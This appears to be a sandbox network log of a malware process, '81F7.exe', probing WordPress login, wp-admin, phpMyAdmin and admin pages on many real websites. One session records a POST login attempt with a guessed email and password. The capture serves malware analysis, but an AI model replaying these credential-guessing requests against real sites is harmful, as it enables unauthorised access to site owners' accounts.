2024-02-20 23:26:19 UTC	16384	IN	Data Raw: 75 67 69 6e 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f 6c 69 62 2f 65 69 63 6f 6e 73 2f 63 73 73 2f 65 6c 65 0d 0a 32 30 30 30 0d 0a 6d 65 6e 74 6f 72 2d 69 63 6f 6e 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 35 2e 32 37 2e 30 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 66 63 61 2e 65 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 31 39 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c Data Ascii: ugins/elementor/assets/lib/eicons/css/ele2000mentor-icons.min.css?ver=5.27.0' media='all' /><link rel='stylesheet' id='elementor-frontend-css' href='https://cfca.eu/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.19.2' media='all' /><
2024-02-20 23:26:19 UTC	16384	IN	Data Raw: 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 61 6c 65 77 61 79 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 0a 20 20 66 6f 0d 0a 31 30 30 30 0d 0a 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 61 6c 65 77 61 79 2f 76 32 39 2f 31 50 74 73 67 38 7a 59 53 5f 53 4b 67 67 50 4e 79 43 67 34 51 49 46 71 50 66 45 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 Data Ascii: ce { font-family: 'Raleway'; font-style: italic; fo1000nt-weight: 600; font-display: swap; src: url(https://fonts.gstatic.com/s/raleway/v29/1Ptsg8zYS_SKggPNyCg4QIFqPfE.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4
2024-02-20 23:26:19 UTC	14797	IN	Data Raw: 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 61 6c 65 77 61 79 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 61 6c 65 77 61 79 2f 76 32 39 2f 31 50 74 75 67 38 7a 59 53 5f 53 4b 67 67 50 4e 79 43 6b 49 54 35 6c 75 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 30 31 2c 20 55 2b 30 34 30 30 2d 30 34 Data Ascii: }/* cyrillic */@font-face { font-family: 'Raleway'; font-style: normal; font-weight: 600; font-display: swap; src: url(https://fonts.gstatic.com/s/raleway/v29/1Ptug8zYS_SKggPNyCkIT5lu.woff2) format('woff2'); unicode-range: U+0301, U+0400-04

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
249	192.168.2.6	52735	81.169.145.86	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	223	OUT	GET /wp-admin/ HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://ksv-schwimmen.de/wp-login.php
2024-02-20 23:26:20 UTC	454	IN	HTTP/1.1 302 Found Date: Tue, 20 Feb 2024 23:26:18 GMT Server: Apache/2.4.58 (Unix) X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Vary: User-Agent Location: https://ksv-schwimmen.de/wp-login.php?redirect_to=https%3A%2F%2Fksv-schwimmen.de%2Fwp-admin%2F&reauth=1 Content-Type: text/html; charset=UTF-8 Connection: close Transfer-Encoding: chunked
2024-02-20 23:26:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
250	192.168.2.6	52826	162.0.235.125	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	183	OUT	GET /wp-login.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	408	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN content-length: 5377 date: Tue, 20 Feb 2024 23:26:18 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:18 UTC	5377	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; norwegischlernen.info — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
251	192.168.2.6	52839	217.26.61.200	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	209	OUT	GET /wp-admin/ HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://eskimo.ch/wp-login.php
2024-02-20 23:26:20 UTC	285	IN	HTTP/1.1 403 Forbidden Date: Tue, 20 Feb 2024 23:26:18 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:20 UTC	2597	IN	Data Raw: 61 31 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 2d 43 48 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 Data Ascii: a1e<!DOCTYPE html><html dir="ltr" lang="de-CH"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><meta name='robots' content='max-image-preview:large, noindex, follow'
2024-02-20 23:26:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
252	192.168.2.6	52996	86.105.245.69	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	177	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	226	IN	HTTP/1.1 302 Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://www.stylesense.co.uk/phpMyAdmin/
2024-02-20 23:26:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
253	192.168.2.6	53117	3.33.130.190	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	166	OUT	GET /admin HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_XewGV8wJRO4cvWNKW9pAioYZJvbfmDjdfNxawhfebpi9mjwIg1MzGDGgSTti6MaUkHq0Rp1dc6C7x/fGP8c/gQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:18 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
254	192.168.2.6	53194	104.21.54.169	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	362	OUT	POST /wp-login.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/wp-login.php Content-Length: 164 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:18 UTC	164	OUT	Data Raw: 6c 6f 67 3d 6a 61 73 6f 6e 25 34 30 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 26 70 77 64 3d 66 6f 72 74 72 65 73 73 25 32 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=jason%40fortressrealcapital.com&pwd=fortress%21&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ffortressrealcapital.com%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:19 UTC	810	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 x-frame-options: SAMEORIGIN set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TacGpnm35XJe9alvRCxSWPCS1fi2sNeRW%2BeF5h4TRaZrQD0eQB%2BXLibsb9OaVr%2FuEYAnHYAnNwzUUf7U%2FnstFsyIlycqS3Nm6WvnKffAR2dzu%2F905%2FNScJJhLSH0RPlhe9lYJWt5o2g95A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a83879b90c34a-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:19 UTC	559	IN	Data Raw: 31 62 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 Data Ascii: 1b48<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Fortress Real Capital — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='
2024-02-20 23:26:19 UTC	1369	IN	Data Raw: 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d Data Ascii: el='stylesheet' id='forms-css' href='https://fortressrealcapital.com/wp-admin/css/forms.min.css?ver=6.4.3' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://fortressrealcapital.com/wp-admin/css/l10n.min.css?ver=6.4.3' type=
2024-02-20 23:26:19 UTC	1369	IN	Data Raw: 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 22 3e 50 6f 77 65 72 65 64 20 62 79 20 57 6f 72 64 50 72 65 73 73 3c 2f 61 3e 3c 2f 68 31 3e 0a 09 3c 64 69 76 20 69 64 3d 22 6c 6f 67 69 6e 5f 65 72 72 6f 72 22 20 63 6c 61 73 73 3d 22 6e 6f 74 69 63 65 20 6e 6f 74 69 63 65 2d 65 72 72 6f 72 22 3e 3c 70 3e 55 6e 6b 6e 6f 77 6e 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 2e 20 43 68 65 63 6b 20 61 67 61 69 6e 20 6f 72 20 74 72 79 20 79 6f 75 72 20 75 73 65 72 6e 61 6d 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 0a 09 09 3c 66 6f 72 6d 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 Data Ascii: ><a href="https://wordpress.org/">Powered by WordPress</a></h1><div id="login_error" class="notice notice-error"><p>Unknown email address. Check again or try your username.</p></div><form name="loginform" id="loginform" action="https://fortressrealca
2024-02-20 23:26:19 UTC	1369	IN	Data Raw: 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 20 62 75 74 74 6f 6e 2d 6c 61 72 67 65 22 20 76 61 6c 75 65 3d 22 4c 6f 67 20 49 6e 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 72 65 64 69 72 65 63 74 5f 74 6f 22 20 76 61 6c 75 65 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 74 65 73 74 63 6f 6f 6b 69 65 22 20 76 61 6c 75 65 3d 22 31 22 20 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 09 09 3c 2f 66 6f 72 6d 3e 0a 0a 09 09 09 09 09 3c 70 20 69 64 3d 22 6e 61 76 22 3e 0a 09 09 09 09 3c 61 20 63 Data Ascii: button-primary button-large" value="Log In" /><input type="hidden" name="redirect_to" value="https://fortressrealcapital.com/wp-admin/" /><input type="hidden" name="testcookie" value="1" /></p></form><p id="nav"><a c
2024-02-20 23:26:19 UTC	1369	IN	Data Raw: 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 7a 78 63 76 62 6e 2e 6d 69 6e 2e 6a 73 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 7a 78 63 76 62 6e 2d 61 73 79 6e 63 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 30 22 20 69 64 3d 22 7a 78 63 76 62 6e 2d 61 73 79 6e 63 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 Data Ascii: m\/wp-includes\/js\/zxcvbn.min.js"};/* ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-includes/js/zxcvbn-async.min.js?ver=1.0" id="zxcvbn-async-js"></script><script type="text/javascript" src="https://fortressrea
2024-02-20 23:26:19 UTC	957	IN	Data Raw: 61 74 63 68 22 3a 22 4d 69 73 6d 61 74 63 68 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 70 61 73 73 77 6f 72 64 2d 73 74 72 65 6e 67 74 68 2d 6d 65 74 65 72 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 33 22 20 69 64 3d 22 70 61 73 73 77 6f 72 64 2d 73 74 72 65 6e 67 74 68 2d 6d 65 74 65 72 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 Data Ascii: atch":"Mismatch"};/* ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-admin/js/password-strength-meter.min.js?ver=6.4.3" id="password-strength-meter-js"></script><script type="text/javascript" src="https://fortress
2024-02-20 23:26:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
255	192.168.2.6	53370	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	169	OUT	GET /admin/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_JIcViAD4swhedtEZLLkRgPLSHnjNDCIIZgAnSH03PvQwCObcaZbKKhl10fK32MqtpoxtgYJpTvNqq1fOd7LMzQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:18 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
256	192.168.2.6	53462	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	166	OUT	GET /admin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
